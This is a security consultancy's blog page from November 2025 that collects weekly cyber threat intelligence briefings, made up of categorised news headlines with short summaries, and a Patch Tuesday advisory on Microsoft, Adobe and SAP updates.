SilentButDeadly - Network Communication Blocker Tool That Neutralizes EDR/AV

Dragon Breath Uses RONINGLOADER to Disable Security Tools and Deploy Gh0st RAT

Vibe coding to vibe hacking: securing software in the AI era | TechRadar

Resilience At Risk: Talent and Governance in the Age of AI - Infosecurity Magazine

VPN Ban—iPhone And Android ‘Privacy Nightmare’ Is Coming True

What insurers really look at in your identity controls - Help Net Security

What security pros should know about insurance coverage for AI chatbot wiretapping claims - Help Net Security

Cursor Issue Paves Way for Credential-Stealing Attacks

CISO pay is on the rise, even as security budgets tighten | CIO Dive

New Security Tools Target Growing macOS Threats

Other News

Palo Alto kit sees massive surge in malicious activity • The Register

Schools share blame for PowerSchool mega-hack, say watchdogs • The Register

The internet isn't free: Shutdowns, surveillance and algorithmic risks - Help Net Security

Initial Access Brokers (IAB) in 2025 - From Dark Web Listings to Supply Chain Ransomware Events

Hospitals in the cyber crosshairs - POLITICO

How the classic anime 'Ghost in the Shell' predicted the future of cybersecurity 30 years ago | TechCrunch

Cyber Operations on Domestic Networks Redux | Lawfare

Black Friday as retailers face cyber surge

TV streaming piracy service with 26M yearly visits shut down

Military Objective or Civilian Object? The Italian National Cybersecurity Agency's Status in Case of Armed Conflict - Lieber Institute West Point

Vulnerability Management

Chinese Nation-State Groups Hijacking Software Updates

Threat group reroutes software updates through hacked network gear - Help Net Security

Can a Global, Decentralized System Save CVE Data?

ENISA Is Now a CVE Program Root - DataBreachToday

Cyber Agency Warns of Government Exploits - DevX

Vulnerabilities

Fortinet finally cops to critical bug under active exploit • The Register

Fortinet Discloses Second Exploited FortiWeb Zero-Day in a Week - SecurityWeek

New SonicWall SonicOS flaw allows hackers to crash firewalls

Fortinet’s delayed alert on actively exploited defect put defenders at a disadvantage | CyberScoop

Researchers Find Serious AI Bugs Exposing Meta, Nvidia, and Microsoft Inference Frameworks

Perplexity's Comet AI browser may have some concerning security flaws which could let hacker hijack your device | TechRadar

7-Zip RCE flaw (CVE-2025-11001) actively exploited in attacks in the wild

SolarWinds Patches Three Critical Serv-U Vulnerabilities - SecurityWeek

ASUS warns of critical auth bypass flaw in DSL series routers

Google fixed the seventh Chrome zero-day in 2025

W3 Total Cache WordPress plugin vulnerable to PHP command injection

WordPress plugin with over a million installs may have a worrying security flaw - here's what we know | TechRadar

CVE-2025-50165: Critical Flaw in Windows Graphics Component - Security Boulevard

New WrtHug campaign hijacks thousands of end-of-life ASUS routers

ServiceNow AI Agents Can Be Tricked Into Acting Against Each Other via Second-Order Prompts

Millions of sites at risk from Imunify360 critical flaw exploit

RondoDox expands botnet by exploiting XWiki RCE bug left unpatched since February 2025

D-Link warns of new RCE flaws in end-of-life DIR-878 routers

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 16/11/2025 Black Arrow Admin 16/11/2025

Black Arrow Cyber Threat Intelligence Briefing 14 November 2025

Black Arrow Cyber Threat Intelligence Briefing 14 November 2025:

-Microsoft Teams’ New “Chat With Anyone” Feature Exposes Users To Phishing and Malware Attacks

-Chinese Spies Told Claude To Break Into About 30 Critical Orgs. Some Attacks Succeeded

-5 Reasons Why Attackers Are Phishing Over LinkedIn

-Cyber Insurers Paid Out Over Twice as Much for UK Ransomware Attacks Last Year

-Large Organisations Aren’t Paying Ransomware Threats Anymore: SMBs Are

-FBI: Akira Gang Has Received Nearly $250 Million in Ransoms

-Companies Forced to Make Financial Changes After a Cyberattack

-Cyberattack Impact on Employees May Be as Serious as Technical Fallout

-UK’s New Cyber Security and Resilience Bill Targets Weak Links in Critical Services

-Spy Boss Says Authoritarian Nations Ready to Commit ‘High Impact Sabotage’

-Online Age Checking Is Creating a Treasure Trove of Data for Hackers

-Google Play Store Hosted 239 Malicious Apps That Were Downloaded 40 Million Times

-Android Malware Steals Your Card Details and PIN to Make Instant ATM Withdrawals

Executive Summary

We start this week with alerts on emerging attacks for business leaders and employees to act on. A new feature in Microsoft Teams gives attackers an easier route into organisations, while a leading developer of advanced AI systems has found hostile actors using its AI model to conduct real attacks. We also report how LinkedIn is used to bypass corporate email defences through direct, trusted-looking messages.

Once in, whether through these channels or others, attackers continue to deploy ransomware. Small and medium sized organisations are particularly targeted, and we highlight how incidents affect victims both financially and at a human level.

New cyber legislation is being introduced in the UK, while other countries warn of evolving nation-state threats. We also note the unintended consequences of regulatory requirements, where online age-verification data has created valuable targets for attackers. Finally, we flag malware risks in mobile phone applications found even in approved online stores.

Organisations need to understand developments in cyber security and take steps to strengthen resilience. Contact us to discuss how to do this proportionately and pragmatically.

Governance, Risk and Compliance

The quiet revolution: How regulation is forcing cybersecurity accountability | CyberScoop

Nearly £200 million paid in cyber claims to help UK businesses recover | ABI

Cyberattack impact on employees may be as serious as technical fallout

Three quarters of SMEs unprotected against everyday risks - CIR Magazine

Companies forced to make financial changes after a cyberattack - BetaNews

The changing language of cyber: communicating with the board | IT Pro

Why Cybersecurity Must Shift To Continuous Incident Response

The Professionalised World of Cybercrime and the New Arms Race - Security Boulevard

Board members of critical services operators will soon be required to undergo cyber security training | The Straits Times

Cyberattacks forcing businesses to correct financial outlooks - CIR Magazine

AI is forcing boards to rethink how they govern security - Help Net Security

Cyber Execs Get Insurance, Legal Counsel Perks Amid Higher Risks

CISOs: More Pressure from Internal Expectations than External Threats | MSSP Alert

CISOs are cracking under pressure - Help Net Security

To get funding, CISOs are mastering the language of money - Help Net Security

Reducing the risk of major cyber incidents in the UK through digital resilience | UKAuthority

Omega Systems’ New Financial Services Report Reveals Mounting Regulatory Pressure and Rising ‘Compliance Fatigue’

Threats

Ransomware, Extortion and Destructive Attacks

Qilin Ransomware Activity Surges as Attacks Target Small Businesses - Infosecurity Magazine

Are SMBs facing increasing ransomware threats? | Proton

Ransomware fuels 230% increase in UK cyber insurance payouts • The Register

Threat Actors Leverage RMM Tools to Deploy Medusa & DragonForce Ransomware

Cyberattacks 'costing the UK economy £14.7 billion' a year

Kraken ransomware benchmarks systems for optimal encryption choice

FBI: Akira gang has received nearly $250 million in ransoms | The Record from Recorded Future News

FBI calls Akira ‘top five’ ransomware variant out of 130 targeting US businesses | CyberScoop

'Ransomvibing' Infests Visual Studio Extension Market

Yanluowang initial access broker pleaded guilty to ransomware attacks

How a CPU spike led to uncovering a RansomHub ransomware attack

Russian Hacking Group Sandworm Deploys New Wiper Malware in Ukraine - Infosecurity Magazine

APT37 hackers abuse Google Find Hub in Android data-wiping attacks

The ransomware payment ban: what’s the potential impact for UK businesses? | TechRadar

Russian pleads guilty, staring at 53 years and $9.2M penalty - Cryptopolitan

Ransomware Victims

Allianz UK confirms Oracle EBS compromise • The Register

Nearly 30 Alleged Victims of Oracle EBS Hack Named on Cl0p Ransomware Site - SecurityWeek

Synnovis Finally Issues Breach Notification After 2024 Ransomware Atta - Infosecurity Magazine

Hackers claim to leak Collins Aerospace data | Cybernews

UK economic growth slows due to cyberattack at Jaguar Land Rover

UK NHS Named in Clop Gang's Exploits of Oracle Zero-Days

Bank of England says JLR's cyberattack damaged UK GDP growth • The Register

Washington Post data breach impacts nearly 10K employees, contractors

Government not handing ‘free money’ to JLR after cyber attack, minister insists | Insider Media

GlobalLogic Becomes Latest Cl0p Victim After Oracle EBS Attack - Infosecurity Magazine

Ransomed CTO falls on sword, refuses to pay extortion demand • The Register

DoorDash hit by new data breach in October exposing user information

Phishing & Email Based Attacks

Microsoft Teams’ New “Chat with Anyone” Feature Exposes Users to Phishing and Malware Attacks

5 reasons why attackers are phishing over LinkedIn

AI and phishing: a toxic pair | Professional Security Magazine

Large-Scale ClickFix Phishing Attacks Target Hotel Systems with PureRAT Malware

New Phishing Attack Leverages Popular Brands to Harvest Login Credentials - Cyber Security News

Google Looks to Dim 'Lighthouse' Phishing Kit

Major phishing attack hits hotels with ingenious new scam that also spreads dangerous malware | TechRadar

Business Email Compromise (BEC)/Email Account Compromise (EAC)

Cyberattacks 'costing the UK economy £14.7 billion' a year

Other Social Engineering

Microsoft Teams’ New “Chat with Anyone” Feature Exposes Users to Phishing and Malware Attacks

Attackers upgrade ClickFix with tricks used by online stores - Help Net Security

ClickFix Attacks Against macOS Users Evolving - SecurityWeek

What is FileFix — a ClickFix variation? | Kaspersky official blog

ClickFix may be the biggest security threat your family has never heard of - Ars Technica

5 reasons why attackers are phishing over LinkedIn

Phishers target 5K Facebook advertisers with fake biz pages • The Register

Beware the 'Hi, how are you?' text. It's a scam - here's how it works | ZDNET

This Is the Platform Google Claims Is Behind a 'Staggering’ Scam Text Operation | WIRED

Wanna bet? Scammers are playing the odds better than you are - Help Net Security

Large-Scale ClickFix Phishing Attacks Target Hotel Systems with PureRAT Malware

Google goes after massive phishing enterprise behind those spammy USPS messages - Neowin

Fraud, Scams and Financial Crime

Cyberattacks 'costing the UK economy £14.7 billion' a year

Beware the 'Hi, how are you?' text. It's a scam - here's how it works | ZDNET

This Is the Platform Google Claims Is Behind a 'Staggering’ Scam Text Operation | WIRED

Wanna bet? Scammers are playing the odds better than you are - Help Net Security

$7.3B crypto laundering: ‘Bitcoin Queen’ sentenced to 11 Years in UK

"Vibescamming" is the new online scam everyone’s falling for

Russian Hackers Create 4,300 Fake Travel Sites to Steal Hotel Guests' Payment Data

Google goes after massive phishing enterprise behind those spammy USPS messages - Neowin

Google Looks to Dim 'Lighthouse' Phishing Kit

Thousands of Chinese lured abroad and forced to be scammers - now Beijing is cracking down - BBC News

New NCA Campaign Warns Men Off Crypto Investment Scams - Infosecurity Magazine

'Dodgy' Amazon Fire TV sticks are leaving users open to financial fraud | News Tech | Metro News

Improve Collaboration to Hit Back At Rising Fraud, Says techUK - Infosecurity Magazine

Lost iPhone? Don’t fall for phishing texts saying it was found

How Elder Fraud Reveals Gaps in Human-Centric Security

Artificial Intelligence

Survey Surfaces Sharp Rise in Cybersecurity Incidents Involving AI - Security Boulevard

Chinese hackers used Claude for a large-scale cyberattack, alleges Anthropic - Technology News | The Financial Express

"Vibescamming" is the new online scam everyone’s falling for

AI and phishing: a toxic pair | Professional Security Magazine

Cybercriminals Are Now Using AI to Create Shape-Shifting Malware, Google Warns

AI Agents Are Going Rogue: Here's How to Rein Them In

65% of Leading AI Companies Found With Verified Secrets Leaks - Infosecurity Magazine

Advocacy group calls on OpenAI to address Sora 2’s deepfake risks | CyberScoop

Los Alamos researchers warn AI may upend national security - Help Net Security

EU’s leaked GDPR, AI reforms slated by privacy activists • The Register

AI chat privacy at risk: Microsoft details Whisper Leak side-channel attack

Military experts warn security hole in most AI chatbots can sow chaos

Execs Say AI Use is Making Companies Vulnerable to Attacks: Survey | MSSP Alert

Many Forbes AI 50 Companies Leak Secrets on GitHub - SecurityWeek

Shadow AI risk: Navigating the growing threat of ungoverned AI adoption - Help Net Security

Legal Reputations at Risk: How AI is Reshaping Cyber Threats in Law – Artificial Lawyer

'Ransomvibing' Infests Visual Studio Extension Market

Autonomous AI could challenge how we define criminal behavior - Help Net Security

Oddest ChatGPT leaks yet: Cringey chat logs found in Google analytics tool - Ars Technica

Malware

Microsoft Teams’ New “Chat with Anyone” Feature Exposes Users to Phishing and Malware Attacks

Hackers Exploiting RMM Tools LogMeIn and PDQ Connect to Deploy Malware as a Normal Program

Cybercriminals Are Now Using AI to Create Shape-Shifting Malware, Google Warns

Threat Actors Leverage RMM Tools to Deploy Medusa & DragonForce Ransomware

Infostealers are making this old security practice new again | PCWorld

Hackers Exploit OneDrive.exe Through DLL Sideloading to Execute Arbitrary Code

Hackers Weaponizing Calendar Files as a New Attack Vector Bypassing Traditional Email Defenses

Threat Actors Attacking Outlook and Google Bypassing Traditional Email Defenses

DanaBot malware is back to infecting Windows after 6-month break

Major phishing attack hits hotels with ingenious new scam that also spreads dangerous malware | TechRadar

Over 67,000 Fake npm Packages Flood Registry in Worm-Like Spam Attack

GootLoader Is Back, Using a New Font Trick to Hide Malware on WordPress Sites

Rhadamanthys infostealer disrupted as cybercriminals lose server access

Ferocious Kitten APT Deploying MarkiRAT to Capture Keystroke and Clipboard Logging

1,000+ Servers Hit in Law Enforcement Takedown of Rhadamanthys, VenomRAT, Elysium - SecurityWeek

Large-Scale ClickFix Phishing Attacks Target Hotel Systems with PureRAT Malware

Hidden Logic Bombs in Malware-Laced NuGet Packages Set to Detonate Years After Installation

Hackers abuse Triofox antivirus feature to deploy remote access tools

Bots/Botnets

A new round of Europol’s Operation Endgame dismantled Rhadamanthys, Venom RAT, and Elysium botnet

Mobile

Beware the 'Hi, how are you?' text. It's a scam - here's how it works | ZDNET

APT37 hackers abuse Google Find Hub in Android data-wiping attacks

Google Play Store hosted 239 malicious apps that were downloaded 40 million times - gHacks Tech News

Warning! Don't open these WhatsApp images, else you'll get hacked | PCWorld

New Android Malware ‘Fantasy Hub’ Intercepts SMS Messages, Contacts and Call Logs

Android malware steals your card details and PIN to make instant ATM withdrawals | Malwarebytes

What is the Pixnapping vulnerability, and how to protect your Android smartphone? | Kaspersky official blog

Android Devices Targeted by KONNI APT in Find Hub Exploitation - Infosecurity Magazine

Lost iPhone? Don’t fall for phishing texts saying it was found

Denial of Service/DoS/DDoS

Cisco: Actively exploited firewall flaws now abused for DoS attacks

Multiple Django Vulnerabilities Enable SQL injection and DoS Attack

Cyberattack hits Danish government and defence companies | European Pravda

Internet of Things – IoT

UK.gov probes security risks of Chinese electric buses • The Register

Data Breaches/Leaks

Allianz UK confirms Oracle EBS compromise • The Register

Nearly 30 Alleged Victims of Oracle EBS Hack Named on Cl0p Ransomware Site - SecurityWeek

65% of Leading AI Companies Found With Verified Secrets Leaks - Infosecurity Magazine

Synnovis Finally Issues Breach Notification After 2024 Ransomware Atta - Infosecurity Magazine

Hackers claim to leak Collins Aerospace data | Cybernews

UK NHS Named in Clop Gang's Exploits of Oracle Zero-Days

AI chat privacy at risk: Microsoft details Whisper Leak side-channel attack

Military experts warn security hole in most AI chatbots can sow chaos

Execs Say AI Use is Making Companies Vulnerable to Attacks: Survey | MSSP Alert

Many Forbes AI 50 Companies Leak Secrets on GitHub - SecurityWeek

Legal Reputations at Risk: How AI is Reshaping Cyber Threats in Law – Artificial Lawyer

Washington Post data breach impacts nearly 10K employees, contractors

Website Security Breaches: 13 Lessons Learned from Small Businesses - DevX

Whisper Leak: A novel side-channel attack on remote language models | Microsoft Security Blog

GlobalLogic Becomes Latest Cl0p Victim After Oracle EBS Attack - Infosecurity Magazine

New IT woe at Legal Aid Agency | Law Gazette

Oddest ChatGPT leaks yet: Cringey chat logs found in Google analytics tool - Ars Technica

Organised Crime & Criminal Actors

The Professionalised World of Cybercrime and the New Arms Race - Security Boulevard

This Is the Platform Google Claims Is Behind a 'Staggering’ Scam Text Operation | WIRED

Yanluowang initial access broker pleaded guilty to ransomware attacks

Autonomous AI could challenge how we define criminal behavior - Help Net Security

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

$7.3B crypto laundering: ‘Bitcoin Queen’ sentenced to 11 Years in UK

New NCA Campaign Warns Men Off Crypto Investment Scams - Infosecurity Magazine

Insider Risk and Insider Threats

Cyberattack impact on employees may be as serious as technical fallout

Insurance

Ransomware fuels 230% increase in UK cyber insurance payouts • The Register

Cyber insurance pay-outs triple | Professional Security Magazine

Nearly £200 million paid in cyber claims to help UK businesses recover | ABI

Cyber Execs Get Insurance, Legal Counsel Perks Amid Higher Risks

Supply Chain and Third Parties

Allianz UK confirms Oracle EBS compromise • The Register

Nearly 30 Alleged Victims of Oracle EBS Hack Named on Cl0p Ransomware Site - SecurityWeek

Synnovis notifies of data breach after 2024 ransomware attack

Synnovis Finally Issues Breach Notification After 2024 Ransomware Atta - Infosecurity Magazine

GlobalLogic Becomes Latest Cl0p Victim After Oracle EBS Attack - Infosecurity Magazine

Cloud/SaaS

Microsoft Teams’ New “Chat with Anyone” Feature Exposes Users to Phishing and Malware Attacks

Microsoft's data sovereignty: Now with extra sovereignty! • The Register

Identity and Access Management

Active Directory Under Siege: Why Critical Infrastructure Needs Stronger Security

Encryption

Are we ready for the post-quantum era? | TechRadar

Linux and Open Source

CISA warns of Akira ransomware Linux encryptor targeting Nutanix VMs

Passwords, Credential Stuffing & Brute Force Attacks

New Phishing Attack Leverages Popular Brands to Harvest Login Credentials - Cyber Security News

Enterprise Credentials at Risk – Same Old, Same Old?

Social Media

5 reasons why attackers are phishing over LinkedIn

Phishers target 5K Facebook advertisers with fake biz pages • The Register

The common social media security measure that creates a treasure trove for hackers | The Independent

Online age checking is creating a treasure trove of data for hackers

New Age Verification Bills Could Ban VPNs, Jeopardize the Privacy of Millions - CNET

Regulations, Fines and Legislation

ID verification laws are fueling the next wave of breaches

British government unveils long-awaited landmark cybersecurity bill | The Record from Recorded Future News

New Age Verification Bills Could Ban VPNs, Jeopardize the Privacy of Millions - CNET

EU’s leaked GDPR, AI reforms slated by privacy activists • The Register

Cyber bill offers 'no guarantee of security', tech lawyer says - UKTN

Exclusive: Ofcom is monitoring VPNs following Online Safety Act. Here's how | TechRadar

Omega Systems’ New Financial Services Report Reveals Mounting Regulatory Pressure and Rising ‘Compliance Fatigue’

The Government Shutdown Is a Ticking Cybersecurity Time Bomb | WIRED

China amends its Cybersecurity Law

America’s cybersecurity defenses are cracking | The Verge

Cyber information sharing law would get extension under shutdown deal bill | CyberScoop

CISA, FCEA funding set to resume as shutdown nears its end • The Register

Age verification lands in Italy − here’s how it affects VPN users | TechRadar

Extra defence investment essential to maintain a durable defence culture, experts warn - University of Exeter News

Models, Frameworks and Standards

A guide to the UK Cyber Security and Resilience Bill (CSRB) | Professional Security Magazine

EU’s leaked GDPR, AI reforms slated by privacy activists • The Register

Broken access control still tops list of app sec top 10 • The Register

Data Protection

EU’s leaked GDPR, AI reforms slated by privacy activists • The Register

Careers, Working in Cyber and Information Security

CISOs are cracking under pressure - Help Net Security

CISO Pay Packages Grow as Overall Security Spending Slows: IANS | MSSP Alert

From Forensics to AI: New bulletin maps out Cyber Security careers | Department for the Economy

Extra defence investment essential to maintain a durable defence culture, experts warn - University of Exeter News

Why We Need More Veterans in Intelligence, Cybersecurity, and STEM - ClearanceJobs

Resilience for resilience: Managing burnout among cyber leaders | Computer Weekly

The New Battlefield: 3 Veterans Discuss Their Transition to Cybersecurity | Security Magazine

Cyber Execs Get Insurance, Legal Counsel Perks Amid Higher Risks

Law Enforcement Action and Take Downs

$7.3B crypto laundering: ‘Bitcoin Queen’ sentenced to 11 Years in UK

1,000+ Servers Hit in Law Enforcement Takedown of Rhadamanthys, VenomRAT, Elysium - SecurityWeek

New NCA Campaign Warns Men Off Crypto Investment Scams - Infosecurity Magazine

Yanluowang initial access broker pleaded guilty to ransomware attacks

Russian hacker admits helping Yanluowang ransomware infect companies

Russian pleads guilty, staring at 53 years and $9.2M penalty - Cryptopolitan

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Spy boss says authoritarian nations poised for sabotage • The Register

Australian spy chief warns Chinese hackers are 'probing' critical networks for espionage and sabotage | TechCrunch

Los Alamos researchers warn AI may upend national security - Help Net Security

From Log4j to IIS, China's Hackers Turn Legacy Bugs into Global Espionage Tools

Data breach at Chinese infosec firm reveals weapons arsenal • The Register

Russia's suspected 'hybrid war' puts European air defences to the test | The Straits Times

War continues in cyberspace: Final cybersecurity education session concludes in Kyiv

TP-Link Routers Could Soon Be Banned. Here's What Cybersecurity Experts Say About the Risk - CNET

The threat of space terrorism is no longer science fiction, but we’re ill-prepared to combat it

Nation State Actors

China

Spy boss says authoritarian nations poised for sabotage • The Register

Anthropic Says Claude AI Powered 90% of Chinese Espionage Campaign - SecurityWeek

Chinese hackers used Claude for a large-scale cyberattack, alleges Anthropic - Technology News | The Financial Express

Chinese spies used Claude to break into critical orgs • The Register

China's Cyber Silence Is More Worrying Than Russia's Noise, Chief Cybersecurity Strategist Says - SecurityWeek

Australian spy chief warns Chinese hackers are 'probing' critical networks for espionage and sabotage | TechCrunch

From Log4j to IIS, China's Hackers Turn Legacy Bugs into Global Espionage Tools

Data breach at Chinese infosec firm reveals weapons arsenal • The Register

UK.gov probes security risks of Chinese electric buses • The Register

Denmark and Norway investigate Yutong bus security flaw amid rising tech fears

TP-Link Routers Could Soon Be Banned. Here's What Cybersecurity Experts Say About the Risk - CNET

China amends its Cybersecurity Law

This Is the Platform Google Claims Is Behind a 'Staggering’ Scam Text Operation | WIRED

Thousands of Chinese lured abroad and forced to be scammers - now Beijing is cracking down - BBC News

MPs preparing to examine Chinese state influence at British universities | House of Commons | The Guardian

Palantir CEO Says a Surveillance State Is Preferable to China Winning the AI Race

Russia

China's Cyber Silence Is More Worrying Than Russia's Noise, Chief Cybersecurity Strategist Says - SecurityWeek

Russia's suspected 'hybrid war' puts European air defences to the test | The Straits Times

War continues in cyberspace: Final cybersecurity education session concludes in Kyiv

Russian Hacking Group Sandworm Deploys New Wiper Malware in Ukraine - Infosecurity Magazine

Russian pleads guilty, staring at 53 years and $9.2M penalty - Cryptopolitan

Russian national pleads guilty to breaking into networks for Yanluowang ransomware attacks | CyberScoop

Russian Hackers Create 4,300 Fake Travel Sites to Steal Hotel Guests' Payment Data

Belgian military intelligence service websites attacked by Russian hackers | VRT NWS: news

Russian hacker admits helping Yanluowang ransomware infect companies

Iran

Ferocious Kitten APT Deploying MarkiRAT to Capture Keystroke and Clipboard Logging

North Korea

APT37 hackers abuse Google Find Hub in Android data-wiping attacks

Android Devices Targeted by KONNI APT in Find Hub Exploitation - Infosecurity Magazine

[Editorial] The silent war - The Korea Herald

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Emulating the Espionage-Oriented Group SideWinder - Security Boulevard

Tools and Controls

Hackers Exploiting RMM Tools LogMeIn and PDQ Connect to Deploy Malware as a Normal Program

Threat Actors Leverage RMM Tools to Deploy Medusa & DragonForce Ransomware

Why Cybersecurity Must Shift To Continuous Incident Response

Online age checking is creating a treasure trove of data for hackers

New Age Verification Bills Could Ban VPNs, Jeopardize the Privacy of Millions - CNET

Ransomware fuels 230% increase in UK cyber insurance payouts • The Register

Cisco: Actively exploited firewall flaws now abused for DoS attacks

AI is forcing boards to rethink how they govern security - Help Net Security

ISO - Threat intelligence and why it matters for cybersecurity

Controversy Brews: US Government Targets Banning Top Wi-Fi Router - CNET

Broken access control still tops list of app sec top 10 • The Register

Exclusive: Ofcom is monitoring VPNs following Online Safety Act. Here's how | TechRadar

Resilience and AI risk | Professional Security Magazine

Automation can't fix broken security basics - Help Net Security

The browser is eating your security stack - Help Net Security

CISA warns of Akira ransomware Linux encryptor targeting Nutanix VMs

Active Directory Under Siege: Why Critical Infrastructure Needs Stronger Security

Age verification lands in Italy − here’s how it affects VPN users | TechRadar

To get funding, CISOs are mastering the language of money - Help Net Security

Reducing the risk of major cyber incidents in the UK through digital resilience | UKAuthority

NCSC Set to Retire Web Check and Mail Check Tools - Infosecurity Magazine

Other News

UK department pours massive funds into outdated Windows 10 upgrade while thousands of devices remain stranded on ageing hardware | TechRadar

Who Owns the Cybersecurity of Space? - DataBreachToday

Europe Must Close the Space Gap by Anders Fogh Rasmussen - Project Syndicate

Logistics companies are increasingly targeted by cybercriminals | CargoForwarder Global

Telecoms Cyber Chiefs Adopt Financial Sector’s Model of Collective Defense - WSJ

Vulnerability Management

When Attacks Come Faster Than Patches: Why 2026 Will be the Year of Machine-Speed Security

UK department pours massive funds into outdated Windows 10 upgrade while thousands of devices remain stranded on ageing hardware | TechRadar

Microsoft: Windows 11 23H2 Home and Pro reach end of support

Vulnerabilities

Microsoft Patch Tuesday security updates for November 2025 fixed an actively exploited Windows Kernel bug

Cisco: Actively exploited firewall flaws now abused for DoS attacks

Hackers Exploit OneDrive.exe Through DLL Sideloading to Execute Arbitrary Code

Cisco fixes critical UCCX flaw allowing Root command execution

SAP fixed a maximum severity flaw in SQL Anywhere Monitor

Zoom Workplace for Windows Vulnerability Allow Users to Escalate Privilege

Chipmaker Patch Tuesday: Over 60 Vulnerabilities Patched by Intel - SecurityWeek

High-Severity Vulnerabilities Patched by Ivanti and Zoom - SecurityWeek

Firefox 145 and Chrome 142 Patch High-Severity Flaws in Latest Releases - SecurityWeek

CitrixBleed 2, Cisco Flaw Wreak Havoc as Zero-Day Bugs

CISA Flags Critical WatchGuard Fireware Flaw Exposing 54,000 Fireboxes to No-Login Attacks

Microsoft Exchange 'Under Imminent Threat', Act Now

Fortinet FortiWeb flaw with public PoC exploited to create admin users

Palo Alto PAN-OS Firewall Vulnerability Let Attackers Reboot Firewall by Sending Malicious Packet

Android Devices Targeted by KONNI APT in Find Hub Exploitation - Infosecurity Magazine

Multiple Django Vulnerabilities Enable SQL injection and DoS Attack

What is the Pixnapping vulnerability, and how to protect your Android smartphone? | Kaspersky official blog

Dangerous runC flaws could allow hackers to escape Docker containers

Adobe Patches 29 Vulnerabilities - SecurityWeek

Hackers abuse Triofox antivirus feature to deploy remote access tools

QNAP fixes seven NAS zero-day flaws exploited at Pwn2Own

Critical Triofox Vulnerability Exploited in the Wild - SecurityWeek

RCE flaw in ImunifyAV puts millions of Linux-hosted sites at risk

ChatGPT Vulnerability Exposed Underlying Cloud Infrastructure - SecurityWeek

Synology fixes BeeStation zero-days demoed at Pwn2Own Ireland

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 12/11/2025 Black Arrow Admin 12/11/2025

Black Arrow Cyber Advisory - 12 November 2025 - Security Updates from Microsoft, Adobe and SAP

Executive Summary

This month’s Patch Tuesday features updates from Microsoft, Adobe and SAP. Microsoft’s release spans Windows, Microsoft 365/Office components and server/identity platforms. Adobe has posted product-specific advisories across its portfolio. SAP published its November Patch Day with a notable volume of new Security Notes. Prioritise internet-facing systems, identity infrastructure and widely deployed desktop applications, with emphasis on critical remote code execution and privilege escalation fixes.

Vulnerabilities by Vendor

Microsoft addressed 63 vulnerabilities impacting Windows, Windows Components, Office, Office Components, Edge, Azure Monitor Agent, Dynamics 365, Hyper-V, SQL Server, and WSL (Windows Subsystem for Linux) GUI. Four of these vulnerabilities are rated as Critical and 59 are rated Important. No vulnerabilities addressed this month were publicly known at the time of release and none are known to be under active exploitation.

Adobe updated addresses 29 vulnerabilities across InDesign, InCopy, Photoshop, Illustrator, Pass, Substance 3D Stager, and Format Plugins products. Critical arbitrary code execution vulnerabilities were addressed in InDesign, InCopy, Photoshop, Illustrator, Substance 3D Stager, and Format Plugins. Adobe says there is no evidence that any of these vulnerabilities are known to have been exploited in the wild.

SAP addressed 19 security vulnerabilities this month, including a critical flaw in SQL Anywhere Monitor and other vulnerabilties relating to Solution Manager, CommonCryptoLib, NetWeaver AS ABAP/Java, S/4HANA components, Business Connector, SAP GUI.

What’s the risk to me or my business?

The presence of actively exploited zero-days and critical RCE/privilege escalation vulnerabilities across major enterprise platforms significantly elevates the risk of data breaches, lateral movement, malware deployment, and full system compromise.

What can I do?

Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated as critical or high severity. Regularly review and update your organisation's security policies and ensure that all systems are running supported and up-to-date software versions.

For more information:

Microsoft — https://msrc.microsoft.com/update-guide/releaseNote/2025-Nov

Adobe — https://helpx.adobe.com/security/security-bulletin.html

SAP — https://support.sap.com/en/my-support/knowledge-base/security-notes-news/november-2025.html

Black Arrow Admin 09/11/2025 Black Arrow Admin 09/11/2025

Black Arrow Cyber Threat Intelligence Briefing 07 November 2025

Black Arrow Cyber Threat Intelligence Briefing 07 November 2025:

-Enterprises are Not Prepared for a World of Malicious AI Agents

-The Phishing Renaissance, How AI Brought Back the Classics

-‘Data Sprawl’ Is Now Your Security Team’s Biggest Headache – And It’s Only Going to Get Worse

-Old Threats, New Consequences: 90% of Cyber Claims Stem from Email and Remote Access

-Survey: Organisations are Too Confident in Their Cyber Resiliency

-Thousands Fall Victim to Ransomware as European Attacks Reach Record Highs - Here’s Why They’re So at Risk

-How Ransomware Attacks Leverage Cyber Insurance Policies

-Violent Cybercrime Surges in Europe Amid Big Payouts

-Three of the Biggest Cybercrime Gangs Around Appear to Be Teaming Up - Which Could Be Bad News for All of Us

-Google Says 2026 Will Be the Year AI Supercharges Cybercrime

-Enterprises are Losing Track of the Devices Inside Their Networks

-Britain ‘Highly Vulnerable’ to Russian Cyber Attacks, Warns Former Army Chief

